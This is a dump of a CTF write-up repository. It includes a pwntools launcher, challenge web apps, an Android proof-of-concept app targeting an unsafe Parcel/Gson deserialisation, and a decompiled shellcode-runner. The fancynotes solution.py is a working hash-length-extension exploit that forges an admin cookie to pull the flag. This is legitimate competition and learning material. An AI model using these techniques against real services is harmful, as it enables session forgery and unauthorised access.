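    '''Launch the local target binary and return the pwntools tube for it.

    argv -- extra command-line arguments appended after the binary path.
            The default list is only read here, never mutated.
    *a, **kw -- forwarded unchanged to gdb.debug() or process().

    When the script is run with the GDB argument the binary is started under
    gdb with `gdbscript`; otherwise it is started as a plain process.
    '''
    if args.GDB:
        # Keyword arguments must be forwarded with ** ; unpacking the dict
        # with a single * would pass its keys as stray positional arguments.
        return gdb.debug([elfexe.path] + argv, gdbscript, elfexe.path, *a, **kw)
    return process([elfexe.path] + argv, *a, **kw)

# Specify your gdb script here for debugging. gdb is launched only if the GDB argument is given.
# It is defined after start() but before start() is first called, which is what matters.
gdbscript = '''
# init-gef
# continue
'''.format(**locals())

arguments = []
io = start(arguments)
io.interactive()
io.close()
-------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/src/qemu-riscv: -------------------------------------------------------------------------------- 1 | /usr/bin/qemu-riscv32 -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/src/qemu-riscv-static: -------------------------------------------------------------------------------- 1 | /usr/bin/qemu-riscv32-static -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/RISC-V-Smash-Baby/src/smash-baby: -------------------------------------------------------------------------------- 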
https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/hack-a-sat-23/pwn/dROP-Baby/src/drop-baby -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/dROP-Baby/src/hidden/server.ini: -------------------------------------------------------------------------------- 1 | Application Name:Baby dROP 2 | A1_MSG_LEN:40 3 | A2_MSG_LEN:10 4 | B1_MSG_LEN:20 5 | B2_MSG_LEN:300 6 | CC_MSG_LEN:25 7 | ZY_MSG_LEN:0 8 | SILENT_ERRORS:TRUE -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/dROP-Baby/src/qemu-riscv: -------------------------------------------------------------------------------- 1 | /usr/bin/qemu-riscv32 -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/dROP-Baby/src/qemu-riscv-static: -------------------------------------------------------------------------------- 1 | /usr/bin/qemu-riscv32-static -------------------------------------------------------------------------------- /hack-a-sat-23/pwn/dROP-Baby/src/server.ini: -------------------------------------------------------------------------------- 1 | hidden/server.ini -------------------------------------------------------------------------------- /insomnihack2022/PimpMyVariant/resources/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/insomnihack2022/PimpMyVariant/resources/home.png -------------------------------------------------------------------------------- /insomnihack2022/herald/Herald-e3081153dbcbc3f2bcd6aa0453e8ec6f7055deaf5762aee0a794e28e58b8bb12.apk: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/insomnihack2022/herald/Herald-e3081153dbcbc3f2bcd6aa0453e8ec6f7055deaf5762aee0a794e28e58b8bb12.apk -------------------------------------------------------------------------------- /insomnihack2022/herald/resources/app-flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/insomnihack2022/herald/resources/app-flag.png -------------------------------------------------------------------------------- /insomnihack2022/herald/resources/app-running.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/insomnihack2022/herald/resources/app-running.png -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/README.md: -------------------------------------------------------------------------------- 1 | # CryptoNotes 2 | 3 | Categories: pwn, Android 4 | 5 | Description: 6 | > Insomni'Hack Teaser 2024 - CryptoNotes 7 | > 8 | > System Running: 9 | > 10 | > `system-images;android-30;google_apis_playstore;x86_64` 11 | > 12 | > author: dai 13 | > 14 | > [vuln.apk](./resources/app-a91690d6479014d533bea108755aba2424b45b4b416823ed0c821ae421f820eb.apk) 15 | 16 | **Tags:** pwn, Android, Intent, deserialization, stack buffer overflow 17 | 18 | The writeup for this challenge can be found in [chalkiadakis.me/posts/insomnihack-teaser24/cryptonotes](https://chalkiadakis.me/posts/insomnihack-teaser24/cryptonotes/). The PoC can be found in the [solution/](solution) directory. 
19 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/resources/app-a91690d6479014d533bea108755aba2424b45b4b416823ed0c821ae421f820eb.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/insomnihack2024/CryptoNotes/resources/app-a91690d6479014d533bea108755aba2424b45b4b416823ed0c821ae421f820eb.apk -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/.gitignore: -------------------------------------------------------------------------------- 1 | *.iml 2 | .gradle 3 | /local.properties 4 | /.idea/caches 5 | /.idea/libraries 6 | /.idea/modules.xml 7 | /.idea/workspace.xml 8 | /.idea/navEditor.xml 9 | /.idea/assetWizardSettings.xml 10 | .DS_Store 11 | /build 12 | /captures 13 | .externalNativeBuild 14 | .cxx 15 | local.properties 16 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | # Sets the minimum version of CMake required to build your native library. 2 | # This ensures that a certain set of CMake features is available to 3 | # your build. 4 | 5 | cmake_minimum_required(VERSION 3.4.1) 6 | 7 | set(CMAKE_BUILD_TYPE RelWithDebInfo) 8 | 9 | # Specifies a library name, specifies whether the library is STATIC or 10 | # SHARED, and provides relative paths to the source code. You can 11 | # define multiple libraries by adding multiple add_library() commands, 12 | # and CMake builds them for you. When you build your app, Gradle 13 | # automatically packages shared libraries with your APK. 14 | 15 | find_library( # Defines the name of the path variable that stores the 16 | # location of the NDK library. 
17 | log-lib 18 | 19 | # Specifies the name of the NDK library that 20 | # CMake needs to locate. 21 | log ) 22 | 23 | add_library(mynativelib SHARED app/src/main/cpp/main.cpp) 24 | 25 | target_link_libraries( # Specifies the target library. 26 | mynativelib 27 | # Links the log library to the target library. 28 | ${log-lib} ) -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/.gitignore: -------------------------------------------------------------------------------- 1 | /build -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/build.gradle: -------------------------------------------------------------------------------- 1 | plugins { 2 | id 'com.android.application' 3 | id 'org.jetbrains.kotlin.android' 4 | } 5 | 6 | android { 7 | compileSdk 32 8 | 9 | defaultConfig { 10 | applicationId "com.example.insomnipwn" 11 | minSdk 29 12 | targetSdk 32 13 | versionCode 1 14 | versionName "1.0" 15 | 16 | testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner" 17 | externalNativeBuild { 18 | cmake { 19 | cppFlags '' 20 | } 21 | } 22 | } 23 | 24 | buildTypes { 25 | release { 26 | minifyEnabled false 27 | proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro' 28 | } 29 | } 30 | compileOptions { 31 | sourceCompatibility JavaVersion.VERSION_1_8 32 | targetCompatibility JavaVersion.VERSION_1_8 33 | } 34 | kotlinOptions { 35 | jvmTarget = '1.8' 36 | } 37 | externalNativeBuild { 38 | cmake { 39 | path file('../CMakeLists.txt') 40 | version '3.18.1' 41 | } 42 | } 43 | } 44 | 45 | dependencies { 46 | 47 | implementation 'com.google.code.gson:gson:2.8.9' 48 | implementation 'androidx.core:core-ktx:1.7.0' 49 | implementation 'androidx.appcompat:appcompat:1.5.0' 50 | implementation 'com.google.android.material:material:1.6.1' 51 | implementation 
'androidx.constraintlayout:constraintlayout:2.1.4' 52 | testImplementation 'junit:junit:4.13.2' 53 | androidTestImplementation 'androidx.test.ext:junit:1.1.3' 54 | androidTestImplementation 'androidx.test.espresso:espresso-core:3.4.0' 55 | } -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/proguard-rules.pro: -------------------------------------------------------------------------------- 1 | # Add project specific ProGuard rules here. 2 | # You can control the set of applied configuration files using the 3 | # proguardFiles setting in build.gradle. 4 | # 5 | # For more details, see 6 | # http://developer.android.com/guide/developing/tools/proguard.html 7 | 8 | # If your project uses WebView with JS, uncomment the following 9 | # and specify the fully qualified class name to the JavaScript interface 10 | # class: 11 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview { 12 | # public *; 13 | #} 14 | 15 | # Uncomment this to preserve the line number information for 16 | # debugging stack traces. 17 | #-keepattributes SourceFile,LineNumberTable 18 | 19 | # If you keep the line number information, uncomment this to 20 | # hide the original source file name. 
21 | #-renamesourcefileattribute SourceFile -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 17 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/cpp/mylogger.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #ifndef MY_APPLICATION_MYLOGGER_H 4 | #define MY_APPLICATION_MYLOGGER_H 5 | 6 | #include 7 | 8 | #define ALOGV(...) __android_log_print(ANDROID_LOG_VERBOSE, LOG_TAG, __VA_ARGS__) 9 | #define ALOGD(...) __android_log_print(ANDROID_LOG_DEBUG, LOG_TAG, __VA_ARGS__) 10 | #define ALOGI(...) __android_log_print(ANDROID_LOG_INFO, LOG_TAG, __VA_ARGS__) 11 | #define ALOGW(...) __android_log_print(ANDROID_LOG_WARN, LOG_TAG, __VA_ARGS__) 12 | #define ALOGE(...) 
__android_log_print(ANDROID_LOG_ERROR, LOG_TAG, __VA_ARGS__) 13 | 14 | #endif //MY_APPLICATION_MYLOGGER_H 15 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/java/com/inso/ins24/utils/CryptoConfig.java: --------------------------------------------------------------------------------
//Extracted from the target application via JADX
package com.inso.ins24.utils;

/**
 * Two-field holder (a byte array and a string) copied from the target app.
 *
 * Nothing in this file reads the fields back; they are only assigned in the
 * constructor. NOTE(review): presumably instances are serialised by Gson
 * through JSONBuilder, in which case the field names ALGO and IN become the
 * JSON keys - confirm against the target.
 */
public class CryptoConfig {
    private byte[] ALGO;
    private String IN;

    /**
     * @param algo stored as-is in ALGO (no copy is made)
     * @param in   stored as-is in IN
     */
    public CryptoConfig(byte[] algo, String in) {
        this.ALGO = algo;
        this.IN = in;
    }
}
-------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/java/com/inso/ins24/utils/JSONBuilder.java: --------------------------------------------------------------------------------
//Extracted from the target application via JADX
package com.inso.ins24.utils;

import android.os.Parcel;
import android.os.Parcelable;

import com.google.gson.Gson;
import com.google.gson.GsonBuilder;

/**
 * Parcelable envelope that ships an arbitrary object as two strings: the
 * object's class name and its Gson JSON form.
 *
 * Security note for anyone reusing this pattern: the Parcel constructor
 * resolves whatever class name arrives in the Parcel and asks Gson to build an
 * instance of it. A component that unparcels this type from another app's
 * Intent therefore lets the sender choose which class gets instantiated. A
 * hardened receiver would check the name against a fixed allow-list before
 * calling Class.forName, or carry a closed set of type tags instead of class
 * names.
 */
public class JSONBuilder implements Parcelable {
    // NOTE(review): Creator appears as a raw type here; the generic argument
    // was probably lost when this listing was extracted - confirm against the
    // repository.
    public static final Parcelable.Creator CREATOR = new Parcelable.Creator() {
        @Override // android.os.Parcelable.Creator
        public JSONBuilder[] newArray(int i) {
            return new JSONBuilder[i];
        }
        @Override // android.os.Parcelable.Creator
        public JSONBuilder createFromParcel(Parcel parcel) {
            // Delegates to the private Parcel constructor below.
            return new JSONBuilder(parcel);
        }
    };
    // One shared Gson instance with default settings, used for both directions.
    private static final Gson JSON = new GsonBuilder().create();
    // The wrapped payload; public and mutable.
    public Object data;

    /** Wraps an in-process object so it can be written to a Parcel. */
    public JSONBuilder(Object data) {
        this.data = data;
    }

    /**
     * Rebuilds the payload from a Parcel: reads two strings, resolves one of
     * them as a class and deserialises the other into that class with Gson.
     * The class name is not checked against any list before it is resolved.
     *
     * NOTE(review): as written, the first readString() result is passed as the
     * JSON text and the second as the class name, while writeToParcel emits
     * the class name first. That looks like a decompiler inlining artefact -
     * confirm the real read order against the target's bytecode.
     *
     * @throws RuntimeException wrapping ClassNotFoundException when the name
     *         read from the Parcel does not resolve
     */
    private JSONBuilder(Parcel parcel) {
        try {
            this.data = JSON.fromJson(parcel.readString(), (Class) Class.forName(parcel.readString()));
        } catch (ClassNotFoundException e) {
            throw new RuntimeException(e);
        }
    }

    @Override // android.os.Parcelable
    public int describeContents() {
        return 0;
    }

    /**
     * Writes the payload as (canonical class name, JSON text), in that order.
     * The flags argument is ignored and data is dereferenced without a null
     * check.
     *
     * NOTE(review): getCanonicalName() yields a dotted name for nested classes
     * and null for anonymous or local ones, neither of which Class.forName
     * accepts, so only top-level payload classes would round-trip.
     */
    @Override // android.os.Parcelable
    public void writeToParcel(Parcel parcel, int i) {
        parcel.writeString(this.data.getClass().getCanonicalName());
        parcel.writeString(JSON.toJson(this.data));
    }
}
-------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/res/drawable-v24/ic_launcher_foreground.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 15 | 18 | 21 | 22 | 23 | 24 | 30 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/res/layout/activity_main.xml: -------------------------------------------------------------------------------- 1 | 2 | 8 | 9 | 18 | 19 | 40 | 41 | 42 | 43 |

44 | 45 | 46 | 47 | 48 | {% endautoescape %} 49 | {% endblock %} -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/app/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block content %} 3 | 4 | {% endblock %} -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/app/templates/post.html: -------------------------------------------------------------------------------- 1 | {% extends 'base.html' %} 2 | 3 | 4 | {% block add_post %} 5 |
6 |
7 | 8 | 9 |

Write your post

10 | 11 |
12 | {{ form.hidden_tag() }} 13 |

14 |
15 |
16 |

17 |
18 | 21 |
22 |
23 |
24 | 25 | 26 | 27 | {% endblock %} 28 | 29 | -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/config.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | basedir = os.path.abspath(os.path.dirname(__file__)) 4 | 5 | 6 | class Config(object): 7 | SECRET_KEY = os.environ.get("SECRET_KEY") or os.urandom(32) 8 | SQLALCHEMY_DATABASE_URI = os.environ.get( 9 | "DATABASE_URL" 10 | ) or "sqlite:///" + os.path.join(basedir, "db", "app.db") 11 | SQLALCHEMY_TRACK_MODIFICATIONS = False 12 | -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/db/app.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/dumbforum-src/db/app.db -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "2.2" 2 | services: 3 | web: 4 | build: . 
5 | ports: 6 | - 127.0.0.1:8090:8090 7 | -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/main.py: -------------------------------------------------------------------------------- 1 | from app import app, db 2 | from app.models import User, Post 3 | import logging 4 | 5 | 6 | if __name__ == "__main__": 7 | from waitress import serve 8 | logger = logging.getLogger('waitress') 9 | logger.setLevel(logging.INFO) 10 | serve(app, host="0.0.0.0", port=8090) -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/requirements.txt: -------------------------------------------------------------------------------- 1 | alembic 2 | click 3 | dnspython 4 | email-validator 5 | Flask 6 | Flask-Login 7 | Flask-Migrate 8 | Flask-SQLAlchemy 9 | Flask-WTF 10 | greenlet 11 | idna 12 | itsdangerous 13 | Jinja2 14 | Mako 15 | MarkupSafe 16 | python-dateutil 17 | python-dotenv 18 | python-editor 19 | six 20 | SQLAlchemy 21 | Werkzeug~=2.0.0 22 | WTForms 23 | flask-bootstrap 24 | waitress -------------------------------------------------------------------------------- /m0lecon22/dumbforum/writeup-resources/detour-xss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/writeup-resources/detour-xss.png -------------------------------------------------------------------------------- /m0lecon22/dumbforum/writeup-resources/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/writeup-resources/flag.png -------------------------------------------------------------------------------- /m0lecon22/dumbforum/writeup-resources/index.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/writeup-resources/index.png -------------------------------------------------------------------------------- /m0lecon22/dumbforum/writeup-resources/invalid-email.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/writeup-resources/invalid-email.png -------------------------------------------------------------------------------- /m0lecon22/dumbforum/writeup-resources/register-malicious.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/writeup-resources/register-malicious.png -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-slim 2 | 3 | WORKDIR /app 4 | 5 | COPY requirements.txt /requirements.txt 6 | RUN pip3 install -r /requirements.txt 7 | 8 | COPY app/ /app/ 9 | 10 | RUN mkdir /tmp/uploads 11 | RUN mkdir -p /app/logs/ 12 | 13 | CMD gunicorn -w 4 -b 0.0.0.0:5000 --log-level DEBUG --chdir / --timeout 10 "app:create_app()" -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/__init__.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import logging 4 | from time import sleep 5 | from flask import Flask 6 | from .db import db 7 | from .routes import init_routes 8 | from .models import * 9 | from .utils import init_db 10 | 11 | 12 | def 
create_app(test_config=None): 13 | app = Flask(__name__, instance_relative_config=True) 14 | app.logger.setLevel(logging.DEBUG) 15 | app.config.from_mapping( 16 | SECRET_KEY='dev', 17 | SQLALCHEMY_DATABASE_URI='sqlite:////tmp/test.db', 18 | ) 19 | app.config['MAX_CONTENT_LENGTH'] = 1024 * 1024 20 | 21 | if os.environ.get("DOCKER"): 22 | PASS = os.environ.get("MYSQL_ROOT_PASSWORD") 23 | DB = os.environ.get("MYSQL_DATABASE") 24 | app.config['SQLALCHEMY_DATABASE_URI'] = f'mysql+pymysql://root:{PASS}@db/{DB}?charset=utf8mb4' 25 | else: 26 | app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db' 27 | 28 | if test_config is None: 29 | app.config.from_pyfile('config.py', silent=True) 30 | else: 31 | app.config.from_mapping(test_config) 32 | 33 | try: 34 | os.makedirs(app.instance_path) 35 | except OSError: 36 | pass 37 | 38 | db.init_app(app) 39 | with app.app_context(): 40 | # Connect to database 41 | tries = 10 42 | while tries > 0: 43 | try: 44 | db.create_all() 45 | tries = 0 46 | except: 47 | tries += -1 48 | print('Failed to connect to database. 
Waiting and then trying again (try countdown: %s)' % tries) 49 | sleep(5) 50 | init_db(db) 51 | 52 | app.logger.debug('Hello World!') 53 | init_routes(app) 54 | 55 | return app 56 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/db.py: -------------------------------------------------------------------------------- 1 | from flask_sqlalchemy import SQLAlchemy 2 | 3 | db = SQLAlchemy() 4 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/models.py: -------------------------------------------------------------------------------- 1 | from .db import db 2 | 3 | 4 | class User(db.Model): 5 | id = db.Column(db.Integer, primary_key=True) 6 | username = db.Column(db.String(80), unique=True, nullable=False) 7 | password = db.Column(db.String(256), nullable=False) 8 | locale = db.Column(db.String(3), nullable=False) 9 | 10 | def __repr__(self): 11 | return '' % self.username 12 | 13 | 14 | class Note(db.Model): 15 | id = db.Column(db.Integer, primary_key=True) 16 | title = db.Column(db.String(80), nullable=False) 17 | body = db.Column(db.Text, nullable=False) 18 | picture_id = db.Column(db.String(255), nullable=True) 19 | 20 | user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False) 21 | user = db.relationship('User', backref=db.backref('notes', lazy=True)) 22 | 23 | def __repr__(self): 24 | return '' % self.title 25 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/static/chao.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/fancynotes/fancynotes-src/app/static/chao.gif -------------------------------------------------------------------------------- 
/m0lecon22/fancynotes/fancynotes-src/app/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {% block title %}Fancy notes{% endblock %} 6 | 12 | 18 | 19 | 20 |
{% block content %} {% endblock %}
21 | 22 | {% block script %} {% endblock %} 23 | 24 | 25 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends 'base.html' %} {% block title %}Fancy notes{% endblock %} {% block 2 | content %} 3 |
4 |

Hello!

5 |

Welcome to fancy notes

6 |
7 | Log In 8 |
9 | 14 |
15 | {% endblock %} 16 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends 'base.html' %} {% block title %}Fancy notes - Log in{% endblock 2 | %} {% block content %} 3 |
4 |
5 |
6 |

Log in

7 | 8 | {% if error %} 9 | 10 | {% endif %} 11 | 12 |
13 |
14 | 15 | 21 |
22 |
23 | 24 | 30 |
31 | 32 |
33 | 34 |
35 |

Don't have an account?

36 | Register 37 |
38 |
39 |
40 |
41 | {% endblock %} 42 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/templates/registration.html: -------------------------------------------------------------------------------- 1 | {% extends 'base.html' %} {% block title %}Fancy notes - Registration{% endblock 2 | %} {% block content %} 3 |
4 |
5 |
6 |

Registration

7 | 8 | {% if error %} 9 | 10 | {% endif %} 11 | 12 |
13 |
14 | 15 | 21 |
22 |
23 | 24 | 30 |
31 | 32 |
33 | 34 |
35 |

Already have an account?

36 | Log In 37 |
38 |
39 |
40 |
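# /m0lecon22/fancynotes/fancynotes-src/app/validators.py
import re

# Username alphabet: ASCII letters, digits, '-', '_' and '$'.
_USERNAME_RE = re.compile(r'[a-zA-Z0-9\-_$]+')


def validate_registration(form_data):
    """Check a registration form and return an error string, or None if it is valid.

    form_data must support item access for 'username' and 'password'.
    Checks run in a fixed order and the first failure wins: presence,
    username alphabet, username length (4..30), password length (4..30).
    """
    username = form_data['username']
    password = form_data['password']
    if not username or not password:
        return 'missing parameter'
    # fullmatch() rather than match() with a trailing '$': in Python '$' also
    # matches just before a final newline, so 'name\n' used to pass the
    # alphabet check and reach the rest of the application with the newline.
    if not _USERNAME_RE.fullmatch(username):
        return 'do you have special characters in your name??'
    if len(username) > 30:
        return 'username too long'
    if len(username) < 4:
        return 'username too short'
    if len(password) > 30:
        return 'password too long'
    if len(password) < 4:
        return 'password too short'
    return None


def validate_login(form_data):
    """Return 'missing parameter' if username or password is empty, else None.

    Only presence is checked here; no credential is verified.
    """
    if not form_data['username'] or not form_data['password']:
        return 'missing parameter'
    # Explicit, to match the other validators.
    return None


def validate_note(form_data):
    """Check a note form and return an error string, or None if it is valid.

    The title may be at most 80 characters and the body at most 200.
    """
    title = form_data['title']
    body = form_data['body']
    if not title or not body:
        return 'missing parameter'
    if len(title) > 80:
        return 'title too long'
    # The two "too short" branches are kept for parity with the original; for
    # str values an empty field already returns 'missing parameter' above.
    if len(title) < 1:
        return 'title too short'
    if len(body) > 200:
        return 'body too long'
    if len(body) < 1:
        return 'body too short'
    return None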
6 | ports: 7 | - 5000:5000 8 | depends_on: 9 | - db 10 | restart: always 11 | environment: 12 | - DOCKER=true 13 | - SECRET_KEY=arandomkey 14 | - FLAG=ptm{pleaseD0NOTUseCr3am1nCarbon4r4!} 15 | - MYSQL_ROOT_PASSWORD=arandompassword 16 | - MYSQL_DATABASE=challenge 17 | 18 | db: 19 | image: mariadb:10.8 20 | restart: always 21 | environment: 22 | - MYSQL_ROOT_PASSWORD=arandompassword 23 | - MYSQL_DATABASE=challenge 24 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/requirements.txt: -------------------------------------------------------------------------------- 1 | flask 2 | Flask-SQLAlchemy 3 | pymysql 4 | gunicorn -------------------------------------------------------------------------------- /m0lecon22/fancynotes/solution.py: -------------------------------------------------------------------------------- 1 | 2 | import hashpumpy 3 | import base64 4 | import requests 5 | import urllib3 6 | import re 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxyDict = { 10 | "http" : 'http://127.0.0.1:8080', 11 | "https" : 'http://127.0.0.1:8080', 12 | } 13 | 14 | # Attacker knows: Hash(message1) and length of message1 15 | # Attacker controlls message2 16 | # Attacker calculates Hash(message1 ‖ message2) 17 | 18 | # cookie from remote 19 | cookie = 'dXNlcm5hbWU9ZmFuZSxsb2NhbGU9ZW58Yjg0ZTkxZmU4ZDNmOTkyYmFlYWQ1OGRhODEzYjg0ZjNmYjcxZDg4MzI3ZTEzNDVjY2QwMWRkNmIyODQwYTI2YQ==' 20 | cookie = base64.b64decode(cookie).decode('ascii') 21 | 22 | user_string, signature_str = cookie.split('|') 23 | Hmessage1 = signature_str 24 | message1_length = 1 25 | 26 | message2 = ',username=admin' 27 | while message1_length < 40: 28 | new_signature, new_msg = hashpumpy.hashpump(signature_str, user_string, message2, message1_length) 29 | 30 | new_cookie = new_msg + b'|' + bytes(new_signature, encoding='utf-8') 31 | print(new_cookie) 32 | new_cookie = base64.b64encode(new_cookie).decode('ascii') 
33 | print(new_cookie) 34 | 35 | s = requests.Session() 36 | cookie_obj = requests.cookies.create_cookie( 37 | name="user", value=new_cookie 38 | ) 39 | s.cookies.set_cookie(cookie_obj) 40 | 41 | host = '127.0.0.1:5000' 42 | base_url = 'http://'+host 43 | r = s.get(base_url+'/notes', proxies=proxyDict, verify=False, allow_redirects=False) 44 | print(r.text) 45 | if 'admin' in r.text: 46 | flag = re.search(r'ptm{.+}', r.text).group(0) 47 | break 48 | 49 | message1_length += 1 50 | print(message1_length) 51 | print(new_cookie) 52 | print("Flag: " + flag) 53 | 54 | # ptm{pleaseD0NOTUseCr3am1nCarbon4r4!} 55 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/writeup-resources/create-note.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/fancynotes/writeup-resources/create-note.png -------------------------------------------------------------------------------- /m0lecon22/fancynotes/writeup-resources/index.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/fancynotes/writeup-resources/index.png -------------------------------------------------------------------------------- /m0lecon22/fancynotes/writeup-resources/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/fancynotes/writeup-resources/login.png -------------------------------------------------------------------------------- /m0lecon22/fancynotes/writeup-resources/notes.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/fancynotes/writeup-resources/notes.png -------------------------------------------------------------------------------- /midnight-quals-23/pwn/scaas/resources/sample-run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-23/pwn/scaas/resources/sample-run.png -------------------------------------------------------------------------------- /midnight-quals-23/pwn/scaas/resources/solution-txt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-23/pwn/scaas/resources/solution-txt.png -------------------------------------------------------------------------------- /midnight-quals-23/pwn/scaas/scaas.c: --------------------------------------------------------------------------------
/* NOTE(review): the header names after #include are missing in this listing
 * (probably lost in extraction); the file is decompiler output tidied by hand
 * and is not expected to compile as shown. */
#include
#include

/*
 * Reads one line from stdin, accepts it only if every byte passes
 * is_alphanumeric(), copies it into a fresh anonymous mapping and calls the
 * mapping as a function.
 *
 * From a defender's point of view: the mapping is readable, writable and
 * executable at once and its contents come straight from the caller, so the
 * character filter limits the byte alphabet only. It is not a confinement
 * boundary; any isolation has to come from whatever sandbox the process runs
 * in, which this listing does not show.
 *
 * The return value is the difference between the value read from gs:0x14 at
 * entry and at exit (presumably the decompiler's rendering of the stack
 * protector check - confirm against the binary).
 */
unsigned int scaas() {
  void *v0; // esp
  int v4; // [esp+0h] [ebp-28h] BYREF
  int n; // [esp+8h] [ebp-20h]
